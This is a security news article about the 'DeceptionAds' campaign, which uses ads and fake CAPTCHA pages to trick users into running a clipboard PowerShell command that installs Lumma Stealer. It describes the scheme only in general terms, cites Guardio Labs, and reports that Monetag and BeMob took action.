Fake CAPTCHA pages used to propagate information-stealing malware.

Security researchers have detected a malicious initiative aimed at spreading the Lumma Stealer malware, which uses fake CAPTCHA pages to trick users. These sites generate a false message asking visitors to solve a CAPTCHA by copying harmful code to the clipboard and executing a command in CMD.

This discovery, made by Guardio Labs, reveals an operation known as “DeceptionAds,” which targets millions of individuals. The campaign relies on two legitimate services: the ad network Monetag and the cloud-based performance tracking platform BeMob. It starts with fraudulent ads that echo the preferences of the audience on the host websites, including misleading offers, downloads, or related services, with an emphasis on pirated streaming platforms and software.

When clicking on the ad, the victim is redirected to a fake CAPTCHA page via BeMob's cloaking service. This approach complicates moderation since BeMob is a legitimate service that is not blocked by default from Monetag's network. According to Nati Tal, director of Guardio Labs, “the attackers used a harmless BeMob URL instead of the fake CAPTCHA page, leveraging BeMob's reputation and making Monetag's content moderation efforts more difficult.”

The CAPTCHA page includes JavaScript code that copies a malicious PowerShell command to the clipboard. However, the victim must paste this code into CMD and execute it, constituting the “solution” to the CAPTCHA. By doing so, the command is executed, downloading and running Lumma Stealer, an infostealer commonly found in the underground cybercriminal community.

This malware is capable of stealing a variety of sensitive information, ranging from cryptocurrency wallets and browser data to email credentials, financial information, FTP client data, and system details. Upon being informed about the campaign, both Monetag and BeMob took action. Monetag removed 200 accounts, while BeMob concluded the campaign within four days.